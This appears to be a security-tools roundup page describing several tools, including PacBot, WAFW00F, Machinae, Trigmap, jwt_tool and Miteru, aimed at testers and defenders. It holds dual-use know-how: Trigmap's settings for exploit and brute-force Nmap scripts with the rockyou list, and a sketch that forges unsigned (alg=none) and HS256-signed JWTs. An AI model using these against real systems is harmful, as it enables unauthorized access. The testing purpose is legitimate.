
Pacbot - Platform For Continuous Compliance Monitoring, Compliance Reporting And Security Automation For The Cloud


Policy as Code Bot (PacBot) is a platform for continuous compliance monitoring, compliance reporting and security automation for the cloud. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot auto-fix framework provides the ability to automatically respond to policy violations by taking predefined actions. PacBot packs in powerful visualization features, giving a simplified view of compliance and making it easy to analyze and remediate policy violations. PacBot is more than a tool to manage cloud misconfiguration; it is a generic platform that can be used for continuous compliance monitoring and reporting in any domain.

More Than Cloud Compliance Assessment
PacBot's plugin-based data ingestion architecture allows ingesting data from multiple sources. We have built plugins to pull data from Qualys Vulnerability Assessment Platform, Bitbucket, TrendMicro Deep Security, Tripwire, Venafi Certificate Management, Redhat Satellite, Spacewalk, Active Directory and several other custom-built internal solutions. We are working to open source these plugins and other tools as well. You could write rules based on data collected by these plugins to get a complete picture of your ecosystem and not just cloud misconfigurations. For example, within T-Mobile we have implemented a policy to mark all EC2 instances having one or more severity 5 (CVSS score > 7) vulnerabilities as non-compliant.
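As a rough illustration of that kind of policy (PacBot rules are actually implemented in Java; the function and field names below are hypothetical and only sketch the logic of the T-Mobile example):
# Hypothetical sketch: mark an EC2 instance non-compliant if any scanner
# plugin reported a severity-5 (CVSS score > 7) vulnerability for it.
def evaluate_ec2_vulnerability_policy(instance, vulnerabilities):
    sev5 = [v for v in vulnerabilities
            if v.get("resource_id") == instance.get("instance_id")
            and v.get("cvss_score", 0) > 7]
    if sev5:
        return {"status": "NON_COMPLIANT",
                "resource": instance["instance_id"],
                "reason": "%d severity-5 vulnerabilities open" % len(sev5)}
    return {"status": "COMPLIANT", "resource": instance["instance_id"]}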

Quick Demo


How Does It Work?
Assess -> Report -> Remediate -> Repeat
Assess -> Report -> Remediate -> Repeat is PacBot's philosophy. PacBot discovers resources and assesses them against the policies implemented as code. All policy violations are recorded as issues. Whenever an auto-fix hook is available for a policy, the auto-fix is executed when a resource fails the evaluation. Policy violations cannot be closed manually; the issue has to be fixed at the source, and PacBot will mark it closed in the next scan. Exceptions can be added to policy violations. Sticky exceptions (exceptions based on resource attribute matching criteria) can be added to exempt similar resources that may be created in the future.
PacBot's Asset Groups are a powerful way to visualize compliance. Asset Groups are created by defining one or more target resource attribute matching criteria. For example, you could create an Asset Group of all running assets by defining criteria to match all EC2 instances with the attribute instancestate.name=running. Any new EC2 instance launched after the creation of the Asset Group will be automatically included in the group. In the PacBot UI you can set the scope of the portal to a specific Asset Group. All the data points shown in the PacBot portal will then be confined to the selected Asset Group. Teams using the cloud can set the scope of the portal to their application or org and focus only on their policy violations. This reduces noise and provides a clear picture to cloud users. At T-Mobile, we create Asset Groups per stakeholder, per application, per AWS account, per environment, etc.
Asset Groups can also be used to define the scope of rule executions. PacBot policies are implemented as one or more rules. These rules can be configured to run against all resources or against a specific Asset Group. The rules will evaluate all resources in the Asset Group configured as the scope for the rule. This makes it possible to write policies which are very specific to an application or org. For example, some teams would like to enforce additional tagging standards apart from the global standards set for all of the cloud. They can implement such policies with custom rules and configure these rules to run only on their assets.
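A minimal sketch of the attribute-matching idea behind Asset Groups (hypothetical field names; in the real platform the matching runs against PacBot's inventory store):
# An Asset Group is essentially a set of attribute criteria; any resource
# matching all of them is automatically part of the group.
RUNNING_INSTANCES_GROUP = {"instancestate.name": "running"}

def in_asset_group(resource, criteria):
    return all(resource.get(key) == value for key, value in criteria.items())

resources = [
    {"instance_id": "i-0a1", "instancestate.name": "running"},
    {"instance_id": "i-0b2", "instancestate.name": "stopped"},
]
scoped = [r for r in resources if in_asset_group(r, RUNNING_INSTANCES_GROUP)]
# A rule configured with this Asset Group as its scope only evaluates `scoped`.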

PacBot Key Capabilities
  • Continuous compliance assessment.
  • Detailed compliance reporting.
  • Auto-Fix for policy violations.
  • Omni Search - Ability to search all discovered resources.
  • Simplified policy violation tracking.
  • Self-Service portal.
  • Custom policies and custom auto-fix actions.
  • Dynamic asset grouping to view compliance.
  • Ability to create multiple compliance domains.
  • Exception management.
  • Email Digests.
  • Supports multiple AWS accounts.
  • Completely automated installer.
  • Customizable dashboards.
  • OAuth Support.
  • Azure AD integration for login.
  • Role-based access control.
  • Asset 360 degree.

Technology Stack
  • Front End - Angular
  • Backend APIs, Jobs, Rules - Java
  • Installer - Python and Terraform

Deployment Stack
  • AWS ECS & ECR - For hosting UI and APIs
  • AWS Batch - For rules and resource collection jobs
  • AWS CloudWatch Rules - For rule trigger, scheduler
  • AWS Redshift - Data warehouse for all the inventory collected from multiple sources
  • AWS Elastic Search - Primary data store used by the web application
  • AWS RDS - For admin CRUD functionalities
  • AWS S3 - For storing inventory files and persistent storage of historical data
  • AWS Lambda - For gluing together a few components of PacBot
The PacBot installer automatically launches and configures all of these services. For detailed installation instructions, look at the installation documentation.

PacBot UI Dashboards & Widgets

  • Asset Group Selection Widget

  • Compliance Dashboard



  • Policy Compliance Page - S3 buckets public read access

  • Policy Compliance Trend Over Time

  • Asset Dashboard

  • Asset Dashboard - With Recommendations

  • Asset 360 / Asset Details Page

  • Linux Server Quarterly Patch Compliance

  • Omni-Search Page

  • Search Results Page With Results filtering

  • Tagging Compliance Summary Widget


Installation
Detailed installation instructions are available here

Usage
The installer will launch required AWS services listed in the installation instructions. After successful installation, open the UI load balancer URL. Log into the application using the credentials supplied during the installation. The results from the policy evaluation will start getting populated within an hour. Trendline widgets will be populated when there are at least two data points.
When you install PacBot, the AWS account where you install it is the base account. PacBot installed on the base account can monitor other target AWS accounts. Refer to the instructions here to add new accounts to PacBot. By default, the base account is monitored by PacBot.
Log in as an Admin user and go to the Admin page from the top menu. In the Admin section, you can
  1. Create/Manage Policies
  2. Create/Manage Rules and associate Rules with Policies
  3. Create/Manage Asset Groups
  4. Create/Manage Sticky Exceptions
  5. Manage Jobs
  6. Create/Manage Access Roles
  7. Manage PacBot Configurations
See detailed instructions with screenshots on how to use the admin features here

User Guide / Wiki
Wiki is here.

Announcement Blog Post
Introducing PacBot



Horn3t - Powerful Visual Subdomain Enumeration At The Click Of A Mouse


Horn3t is your #1 tool for exploring subdomains visually.
Building on the great Sublist3r framework (or extensible with your favorite one), it searches for subdomains and generates picture previews. Get a fast overview of your target with HTTP status codes, add custom-found subdomains, and directly access found URLs with one click (a rough sketch of the preview idea follows the list below).
  • Recon your targets at blazing speed
  • Enhance your productivity by focusing on interesting looking sites
  • Enumerate critical sites immediately
  • Sting your target
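A rough sketch of the preview idea, assuming the requests and selenium Python packages and a local Chrome/Chromium install (Horn3t's own implementation builds on Sublist3r and its web UI; this is only an illustration):
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

def preview(url, out_png):
    # Grab the HTTP status code shown in the overview.
    status = requests.get(url, timeout=10, allow_redirects=True).status_code
    # Render the page headlessly and save a screenshot as the picture preview.
    opts = Options()
    opts.add_argument("--headless")
    opts.add_argument("--window-size=1280,800")
    driver = webdriver.Chrome(options=opts)
    try:
        driver.get(url)
        driver.save_screenshot(out_png)
    finally:
        driver.quit()
    return status

print(preview("https://example.com", "example.png"))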

Installation
  • Install Google Chrome
  • Install requirements.txt with pip3
  • Install requirements.txt of sublist3r with pip3
  • Put the directory within the web server of your choice
  • Make sure to have the right permissions
  • Run horn3t.py
Or, alternatively, use the install.sh file with Docker.
Afterwards you can access the web portal at http://localhost:1337

Todo
  • Better Scaling on Firefox
  • Add Windows Dockerfile
  • Direct Nmap support per click on a subdomain
  • Direct Dirb support per click on a subdomain
  • Generate PDF Reports of found subdomains
  • Assist with subdomain takeover

Credits
  • aboul3la - The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.
  • TheRook - The bruteforce module was based on his script subbrute.
  • bitquark - Subbrute's wordlist was based on his dnspop research.
Tested on Windows 10 and Debian with Google Chrome/Chromium 73


WAFW00F v1.0.0 - Detect All The Web Application Firewall!


WAFW00F identifies and fingerprints Web Application Firewall (WAF) products.

How does it work?
To do its magic, WAFW00F does the following:
  • Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions (a rough sketch of this step follows the list).
  • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
  • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.
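As a rough illustration of the first step, a toy fingerprint check might look like this (these are not WAFW00F's actual signatures, just an assumed example using the requests library):
import requests

# Toy signatures: header hints pointing at a particular WAF/CDN.
SIGNATURES = {
    "Cloudflare (Cloudflare Inc.)":
        lambda r: "cloudflare" in r.headers.get("Server", "").lower(),
    "Sucuri (Sucuri Inc.)":
        lambda r: "sucuri" in r.headers.get("Server", "").lower(),
}

def naive_waf_check(url):
    response = requests.get(url, timeout=10)
    return [name for name, matches in SIGNATURES.items() if matches(response)]

print(naive_waf_check("https://example.org"))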

What does it detect?
It detects a number of WAFs. To view which WAFs it is able to detect, run WAFW00F with the -l option. At the time of writing the output is as follows:
$ wafw00f -l
______
/ \
( Woof! )
\______/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|

WAFW00F - Web Application Firewall Detection Tool

Can test for these WAFs:

BlockDoS (BlockDoS)
Armor Defense (Armor)
ACE XML Gateway (Cisco)
Malcare (Inactiv)
RSFirewall (RSJoomla!)
PerimeterX (PerimeterX)
Varnish (OWASP)
Barracuda Application Firewall (Barracuda Networks)
Anquanbao (Anquanbao)
NetContinuum (Barracuda Networks)
HyperGuard (Art of Defense)
Incapsula (Imperva Inc.)
Safedog (SafeDog)
NevisProxy (AdNovum)
SEnginx (Neusoft)
BitNinja (BitNinja)
Janusec Application Gateway (Janusec)
NinjaFirewall (NinTechNet)
Edgecast (Verizon Digital Media)
Alert Logic (Alert Logic)
Cloudflare (Cloudflare Inc.)
SecureSphere (Imperva Inc.)
Bekchy (Faydata Technologies Inc.)
Kona Site Defender (Akamai)
Wallarm (Wallarm Inc.)
Cloudfront (Amazon)
aeSecure (aeSecure)
eEye SecureIIS (BeyondTrust)
VirusDie (VirusDie LLC)
DOSarrest (DOSarrest Internet Security)
SiteGround (SiteGround)
Chuang Yu Shield (Yunaq)
Yunsuo (Yunsuo)
NAXSI (NBS Systems)
UTM Web Protection (Sophos)
Approach (Approach)
NetScaler AppFirewall (Citrix Systems)
DynamicWeb Injection Check (DynamicWeb)
Xuanwudun
WebTotem (WebTotem)
Comodo (Comodo CyberSecurity Solutions)
WTS-WAF (WTS)
PowerCDN (PowerCDN)
BIG-IP Access Policy Manager (F5 Networks)
BinarySec (BinarySec)
Greywizard (Grey Wizard)
Shield Security (One Dollar Plugin)
ASP.NET Generic Web Application Protection
CacheWall (Varnish)
Expression Engine (EllisLab)
Airlock (Phion/Ergon)
WatchGuard (WatchGuard Technologies)
WP Cerber Security (Cerber Tech)
Yunjiasu (Baidu Cloud Computing)
DenyALL (Rohde & Schwarz CyberSecurity)
AnYu (AnYu Technologies)
Secure Entry (United Security Providers)
ISA Server (Microsoft)
Yundun (Yundun)
FirePass (F5 Networks)
GoDaddy Website Protection (GoDaddy)
Imunify360 (CloudLinux)
Safe3 Web Firewall (Safe3)
WebSEAL (IBM)
NSFocus (NSFocus Global Inc.)
360WangZhanBao (360 Technologies)
Squarespace (Squarespace)
Imperva SecureSphere
Bluedon (Bluedon IST)
AliYunDun (Alibaba Cloud Computing)
Wordfence (Feedjit)
Palo Alto Next Gen Firewall (Palo Alto Networks)
Tencent Cloud Firewall (Tencent Technologies)
West263CDN
WebARX (WebARX Security Solutions)
Mission Control Application Shield (Mission Control)
BIG-IP Local Traffic Manager (F5 Networks)
Sitelock (TrueShield)
ZScaler (Accenture)
CrawlProtect (Jean-Denis Brun)
Teros (Citrix Systems)
AWS Elastic Load Balancer (Amazon)
Cloudbric (Zendesk)
StackPath (StackPath)
URLScan (Microsoft)
Sucuri (Sucuri Inc.)
TransIP Web Firewall (TransIP)
OnMessage Shield (BlackBaud)
Distil (Distil Networks)
Profense (ArmorLogic)
ModSecurity (SpiderLabs)
FortiWeb (Fortinet)
XLabs Security WAF (XLabs)
ASP.NET RequestValidationMode (Microsoft)
Jiasule (Jiasule)
ChinaCache CDN Load Balancer (ChinaCache)
URLMaster SecurityCheck (iFinity/DotNetNuke)
Reblaze (Reblaze)
Newdefend (NewDefend)
Trafficshield (F5 Networks)
KS-WAF (KnownSec)
SiteGuard (Sakura Inc.)
CdnNS Application Gateway (CdnNs/WdidcNet)
DataPower (IBM)
WebKnight (AQTRONIX)
BIG-IP Application Security Manager (F5 Networks)
Barikode (Ethic Ninja)
Zenedge (Zenedge)
SonicWall (Dell)
DotDefender (Applicure Technologies)
USP Secure Entry Server
AppWall (Radware)

How do I use it?
First, install the tools as described here.
For help please make use of the --help option. The basic usage is to pass it a URL as an argument. Example:
$  wafw00f https://example.org

______
/ \
( Woof! )
\______/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|

WAFW00F - Web Application Firewall Detection Tool

Checking https://example.org
The site https://example.org is behind Edgecast (Verizon Digital Media) WAF.
Number of requests: 1

How do I install it?
The following should do the trick:
python setup.py install

Looking for pentesters?
More information about the services that we offer at Enable Security

How do I write my own new checks?
Follow the instructions on the wiki


Machinae v1.4.8 - Security Intelligence Collector


Machinae is a tool for collecting intelligence from public sites/feeds about various security-related pieces of data: IP addresses, domain names, URLs, email addresses, file hashes, and SSL fingerprints. It was inspired by Automater, another excellent tool for collecting information. The Machinae project was born from wishing to improve Automater in 4 areas:
  1. Codebase - Bring Automater to python3 compatibility while making the code more pythonic
  2. Configuration - Use a more human readable configuration format (YAML)
  3. Inputs - Support JSON parsing out-of-the-box without the need to write regular expressions, but still support regex scraping when needed
  4. Outputs - Support additional output types, including JSON, while making extraneous output optional

Installation
Machinae can be installed using pip3:
pip3 install machinae
Or, if you're feeling adventurous, can be installed directly from github:
pip3 install git+https://github.com/HurricaneLabs/machinae.git
You will need to have whatever dependencies are required on your system for compiling Python modules (on Debian based systems, python3-dev), as well as the libyaml development package (on Debian based systems, libyaml-dev).
You'll also want to grab the latest configuration file and place it in /etc/machinae.yml.

Configuration File
Machinae supports a simple configuration merging system to allow you to make adjustments to the configuration without modifying the machinae.yml we provide you, making configuration updates a snap. This is done by finding a system-wide default configuration (default /etc/machinae.yml), merging into that a system-wide local configuration (/etc/machinae.local.yml) and finally a per-user local configuration (~/.machinae.yml). The system-wide configuration can also be located in the current working directory, can be set using the MACHINAE_CONFIG environment variable, or of course by using the -c or --config command line options. Configuration merging can be disabled by passing the --nomerge option, which will cause Machinae to only load the default system-wide configuration (or the one passed on the command line).
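A minimal sketch of that merge order (assuming PyYAML; this mirrors the behaviour described above rather than Machinae's exact internals):
import os
import yaml

def deep_merge(base, override):
    # Recursively merge `override` into `base`, returning a new dict.
    merged = dict(base)
    for key, value in override.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = value
    return merged

def load_merged_config():
    config = {}
    for path in ("/etc/machinae.yml",
                 "/etc/machinae.local.yml",
                 os.path.expanduser("~/.machinae.yml")):
        if os.path.exists(path):
            with open(path) as fh:
                config = deep_merge(config, yaml.safe_load(fh) or {})
    return config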
As an example of this, say you'd like to enable the Fortinet Category site, which is disabled by default. You could modify /etc/machinae.yml, but these changes would be overwritten by an update. Instead, you can put the following in either /etc/machinae.local.yml or ~/.machinae.yml:
fortinet_classify:
  default: true
Or, conversely, to disable a site, such as Virus Total pDNS:
vt_ip:
  default: false
vt_domain:
  default: false

Usage
Machinae usage is very similar to Automater:
usage: machinae [-h] [-c CONFIG] [--nomerge] [-d DELAY] [-f FILE] [-i INFILE] [-v]
[-o {D,J,N,S}] [-O {ipv4,ipv6,fqdn,email,sslfp,hash,url}] [-q]
[-s SITES] [-a AUTH] [-H HTTP_PROXY]
[--dump-config | --detect-otype]
...
  • See above for details on the -c/--config and --nomerge options.
  • Machinae supports a -d/--delay option, like Automater. However, Machinae uses 0 by default.
  • Machinae output is controlled by two arguments:
    • -o controls the output format, and can be followed by a single character to indicate the desired type of output:
      • N is the default output ("Normal")
      • D is the default output, but dot characters are replaced
      • J is JSON output
    • -f/--file specifies the file where output should be written. The default is "-" for stdout.
  • Machinae will attempt to auto-detect the type of target passed in (Machinae refers to targets as "observables" and the type as "otype"). This detection can be overridden with the -O/--otype option. The choices are listed in the usage
  • By default, Machinae operates in verbose mode. In this mode, it will output status information about the services it is querying on the console as they are queried. This output will always be written to stdout, regardless of the output setting. To disable verbose mode, use -q
  • By default, Machinae will run through all services in the configuration that apply to each target's otype and are not marked as "default: false". To modify this behavior, you can:
    • Pass a comma separated list of sites to run (use the top level key from the configuration).
    • Pass the special keyword all to run through all services including those marked as "default: false"
    Note that in both cases, otype validation is still applied.
  • Machinae supports passing an HTTP proxy on the command line using the -H/--http-proxy argument. If no proxy is specified, machinae will search the standard HTTP_PROXY and HTTPS_PROXY environment variables, as well as the less standard http_proxy and https_proxy environment variables.
  • Lastly, a list of targets should be passed. All arguments other than the options listed above will be interpreted as targets.

Out-of-the-Box Data Sources
Machinae comes with out-of-the-box support for the following data sources:
  • IPVoid
  • URLVoid
  • URL Unshortener (http://www.toolsvoid.com/unshorten-url)
  • Malc0de
  • SANS
  • FreeGeoIP (freegeoip.io)
  • Fortinet Category
  • VirusTotal pDNS (via web scrape - commented out)
  • VirusTotal pDNS (via JSON API)
  • VirusTotal URL Report (via JSON API)
  • VirusTotal File Report (via JSON API)
  • Reputation Authority
  • ThreatExpert
  • VxVault
  • ProjectHoneypot
  • McAfee Threat Intelligence
  • StopForumSpam
  • Cymru MHR
  • ICSI Certificate Notary
  • TotalHash (disabled by default)
  • DomainTools Parsed Whois (Requires API key)
  • DomainTools Reverse Whois (Requires API key)
  • DomainTools Reputation
  • IP WHOIS (Using RIR REST interfaces)
  • Hacked IP
  • Metadefender Cloud (Requires API key)
  • GreyNoise (Requires API key)
  • IBM XForce (Requires API key)
With additional data sources on the way.

HTTP Basic Authentication and Configuration
Machinae supports HTTP Basic Auth for sites that require it through the --auth/-a flag. You will need to create a YAML file with your credentials, which will include a key to the site that requires the credentials and a list of two items, username and password or API key. For example, for the included PassiveTotal site this might look like:
passivetotal: ['myemail@example.com', 'my_api_key']
Inside the site configuration under request you will see a key such as:
json:
  request:
    url: '...'
    auth: passivetotal
The auth: passivetotal points to the key inside the authentication config passed via the command line.

Disabled by default
The following sites are disabled by default
  • Fortinet Category (fortinet_classify)
  • Telize Geo IP (telize)
  • TotalHash (totalhash_ip)
  • DomainTools Parsed Whois (domaintools_parsed_whois)
  • DomainTools Reverse Whois (domaintools_reverse_whois)
  • DomainTools Reputation (domaintools_reputation)
  • PassiveTotal Passive DNS (passivetotal_pdns)
  • PassiveTotal Whois (passivetotal_whois)
  • PassiveTotal SSL Certificate History (passivetotal_sslcert)
  • PassiveTotal Host Attribute Components (passivetotal_components)
  • PassiveTotal Host Attribute Trackers (passivetotal_trackers)
  • MaxMind GeoIP2 Passive Insight (maxmind)
  • FraudGuard (fraudguard)
  • Shodan (shodan)
  • Hacked IP
  • Metadefender Cloud (Requires API key)
  • GreyNoise (Requires API key)
  • IBM XForce (Requires API key)

Output Formats
Machinae comes with a limited set of output formats: normal, normal with dot escaping, and JSON. We plan to add additional output formats in the future.

Adding additional sites
*** COMING SOON ***

Known Issues
  • Some ISPs on IPVoid contain double-encoded HTML entities, which are not double-decoded

Upcoming Features
  • Add IDS rule search functionality (VRT/ET)
  • Add "More info" link for sites
  • Add "dedup" option to parser settings
  • Add option for per-otype request settings
  • Add custom per-site output for error codes

Version History

Version 1.4.1 (2018-08-31)
  • New Features
    • Automatically Defangs output
    • MISP Support (example added to machinae.yml)

Version 1.4.0 (2016-04-20)
  • New features
    • "-a"/"--auth" option for passing an auth config file
      • Thanks johannestaas for the submission
    • "-H"/"--http-proxy" option, and environment support, for HTTP proxies
  • New sites
    • Passivetotal (various forms, thanks johannestaas)
    • MaxMind
    • FraudGuard
    • Shodan
  • Updated sites
    • FreeGeoIP (replaced freegeoip.net with freegeoip.io)

Version 1.3.4 (2016-04-01)
  • Bug fixes
    • Convert exceptions to str when outputting to JSON
      • Should actually close #14

Version 1.3.3 (2016-03-28)
  • Bug fixes
    • Correctly handle error results when outputting to JSON
      • Closes #14
      • Thanks Den1al for the bug report

Version 1.3.2 (2016-03-10)
  • New features
    • "Short" output mode - simply output yes/no/error for each site
    • "-i"/"--infile" option for passing a file with list of targets

Version 1.3.1 (2016-03-08)
  • New features
    • Prepend "http://" to URL targets when not starting with http:// or https://

Version 1.3.0 (2016-03-07)
  • New sites
    • Cymon.io - Threat intel aggregator/tracker by eSentire
  • New features
    • Support simple paginated responses
    • Support url encoding 'target' in request URL
    • Support url decoding values in results

Version 1.2.0 (2016-02-16)
  • New features
    • Support for sites returning multiple JSON documents
    • Ability to specify time format for relative time parameters
    • Ability to parse Unix timestamps in results and display in ISO-8601 format
    • Ability to specify status codes to ignore per-API
  • New sites
    • DNSDB - FarSight Security Passive DNS Database (premium)

Version 1.1.2 (2015-11-26)
  • New sites
    • Telize - GeoIP site (premium)
    • Freegeoip - GeoIP site (free)
    • CIF - CIFv2 API support, from csirtgadgets.org
  • New features
    • Ability to specify labels for single-line multimatch JSON outputs
    • Ability to specify relative time parameters using relatime library

Version 1.0.1 (2015-10-13)
  • Fixed a false-positive bug with Spamhaus (Github#10)

Version 1.0.0 (2015-07-02)
  • Initial release



Trigmap - A Wrapper For Nmap To Automate The Pentest


Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scans and, especially, to collect information into a well-organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.

Details
Trigmap can perform several tasks using the Nmap Scripting Engine (NSE):
  • Port Scan
  • Service and Version Detection
  • Web Resources Enumeration
  • Vulnerability Assessment
  • Common Vulnerabilities Test
  • Common Exploits Test
  • Dictionary Attacks Against Active Services
  • Default Credentials Test

Usage
Trigmap can be used in two ways:
  • Interactive mode:
trigmap [ENTER], and the script does the rest

  • NON-interactive mode:
trigmap -h|--host <target/s> [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases]

If you want to see the help:
trigmap --help to print this helper

For more screenshots see the relevant directory of the repository.

Dir Hierarchy

Customization
It's possible to customize the script by changing the value of the variables at the beginning of the file. In particular, you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).
##############################################
### PARAMETERS ###
##############################################
GENERAL_USER_LIST='general_user_wordlist_short.txt'
WIN_USER_LIST='win_user_wordlist_short.txt'
UNIX_USER_LIST='unix_user_wordlist_short.txt'
SHORT_PASS_LIST='fasttrack.txt'
LONG_PASS_LIST='rockyou.txt'

##############################################
### NMAP SETTING ###
##############################################

# PE (echo req), PP (timestamp-request)
# you can add a port on every ping scan
NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'

NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'

SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'

SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'

SCRIPT_ARGS="userdb=$GENERAL_USER_LIST,passdb=$SHORT_PASS_LIST"

CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN

Twin Brother
This project is very similar to Kaboom, but it has a different philosophy; in fact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is its portability and efficiency, but it is recommended to use both tools to scan the targets, so as to gather more evidence with different tools (redundancy and reliability).


JWT Tool - A Toolkit For Testing, Tweaking And Cracking JSON Web Tokens

jwt_tool.py is a toolkit for validating, forging and cracking JWTs (JSON Web Tokens).
Its functionality includes:
  • Checking the validity of a token
  • Testing for the RS/HS256 public key mismatch vulnerability
  • Testing for the alg=None signature-bypass vulnerability
  • Testing the validity of a secret/key/key file
  • Identifying weak keys via a High-speed Dictionary Attack
  • Forging new token header and payload values and creating a new signature with the key or via another attack method

Audience
This tool is written for pentesters, who need to check the strength of the tokens in use, and their susceptibility to known attacks.
It may also be useful for developers who are using JWTs in projects, but would like to test for stability and for known vulnerabilities, when using forged tokens.

Requirements
This tool is written natively in Python 2.x using the common libraries.
Customised wordlists are recommended for the Dictionary Attack option.
As a speed reference, an Intel i5 laptop can test ~1,000,000 passwords per second on HMAC-SHA256 signing. YMMV.

Installation
Installation is just a case of downloading the jwt_tool.py file (or git cloning the repo).
(chmod the file too if you want to add it to your $PATH and call it from anywhere.)

Usage
$ python jwt_tool.py <JWT> (filename)
The first argument should be the JWT itself, followed by a filename/filepath (for cracking the token, or for use as a key file).
For example:
$ python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw /usr/share/wordlists/rockyou.txt
The toolkit will validate the token and list the header and payload values.
It will then provide a menu of your available options.
Note: signing the token is currently supported using the HS256, HS384 and HS512 algorithms
Input is in either standard or url-safe JWT format, and the resulting tokens are output in both formats for your ease of use.
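For context on what the toolkit is exercising, here is a minimal, hand-rolled sketch of two of the best-known manipulations, an alg=none token and an HS256-signed token (standard library only; jwt_tool.py has its own implementation):
import base64, hashlib, hmac, json

def b64url(data):
    # JWTs use unpadded URL-safe base64.
    return base64.urlsafe_b64encode(data).decode().rstrip("=")

def forge_none_token(payload):
    # "alg": "none" bypass: no signature at all, trailing dot kept.
    header = {"typ": "JWT", "alg": "none"}
    return "%s.%s." % (b64url(json.dumps(header).encode()),
                       b64url(json.dumps(payload).encode()))

def sign_hs256(payload, key):
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = "%s.%s" % (b64url(json.dumps(header).encode()),
                               b64url(json.dumps(payload).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return "%s.%s" % (signing_input, b64url(sig))

print(forge_none_token({"login": "ticarpi"}))
print(sign_hs256({"login": "ticarpi"}, b"secret"))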

Further Reading

Tips
Regex for finding JWTs in Burp Search
(make sure 'Case sensitive' and 'Regex' options are ticked)
[= ]ey[A-Za-z0-9_-]*\.[A-Za-z0-9._-]* - url-safe JWT version
[= ]ey[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]* - all JWT versions (higher possibility of false positives)


SecurityRAT - Tool For Handling Security Requirements In Development


OWASP Security RAT (Requirement Automation Tool) is a tool designed to assist with addressing security requirements during application development. The typical use case is:
  • specify parameters of the software artifact you're developing
  • based on this information, a list of common security requirements is generated
  • go through the list of the requirements and choose how you want to handle the requirements
  • persist the state in a JIRA ticket (the state gets attached as a YAML file)
  • create JIRA tickets for particular requirements in a batch mode in developer queues
  • import the main JIRA ticket into the tool at any time in order to see the progress of the particular tickets

Documentation
Please go to https://securityrat.github.io

OWASP Website
https://www.owasp.org/index.php/OWASP_SecurityRAT_Project


Miteru - An Experimental Phishing Kit Detection Tool

Miteru is an experimental phishing kit detection tool.

How it works

Features
  • Phishing kit detection & collection.
  • Slack notification.
  • Threading.

Installation
$ gem install miteru

Usage
$ miteru
Commands:
miteru execute # Execute the crawler
miteru help [COMMAND] # Describe available commands or one specific command
$ miteru help execute
Usage:
miteru execute

Options:
[--auto-download], [--no-auto-download] # Enable or disable auto-download of phishing kits
[--directory-traveling], [--no-directory-traveling] # Enable or disable directory traveling
[--download-to=DOWNLOAD_TO] # Directory to download file(s)
# Default: /tmp
[--post-to-slack], [--no-post-to-slack] # Post a message to Slack if it detects a phishing kit
[--size=N] # Number of urlscan.io's results. (Max: 10,000)
# Default: 100
[--threads=N] # Number of threads to use
# Default: 10
[--verbose], [--no-verbose]
# Default: true

Execute the crawler
$ miteru execute
...
https://dummy1.com: it doesn't contain a phishing kit.
https://dummy2.com: it doesn't contain a phishing kit.
https://dummy3.com: it doesn't contain a phishing kit.
https://dummy4.com: it might contain a phishing kit (dummy.zip).

Using Docker (alternative if you don't install Ruby)
$ git clone https://github.com/ninoseki/miteru.git
$ cd miteru/docker
$ docker build -t miteru .
$ docker run miteru
# ex. auto-download detected phishing kit(s) into the host machine's /tmp directory
$ docker run -v /tmp:/tmp miteru execute --auto-download

Asciinema cast


Note
To use the --post-to-slack feature, you should set the following environment variables:
  • SLACK_WEBHOOK_URL: Your Slack Webhook URL.
  • SLACK_CHANNEL: Slack channel to post a message (default: "#general").

Alternatives



Project iKy - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Project

First of all, we want to advise you that we have changed the frontend from AngularJS to Angular 7. For this reason we left the project with AngularJS as the frontend in the iKy-v1 branch, and the documentation for its installation is here.
The reason for changing the frontend was to update the technology and provide an easier installation.

Video



Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend


Redis
You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server

Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
Then turn on Celery in another terminal, within the backend directory
./celery.sh
Finally, in another terminal, turn on the backend app from the backend directory
python app.py

Install Frontend


Node
First of all, install nodejs.

Dependencies
Inside the frontend directory, install the dependencies
npm install

Turn on Frontend Server
Finally, to run frontend server, execute:
npm start

Browser

Open the browser at this URL

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.

  • Fullcontact: Generate the APIs from here
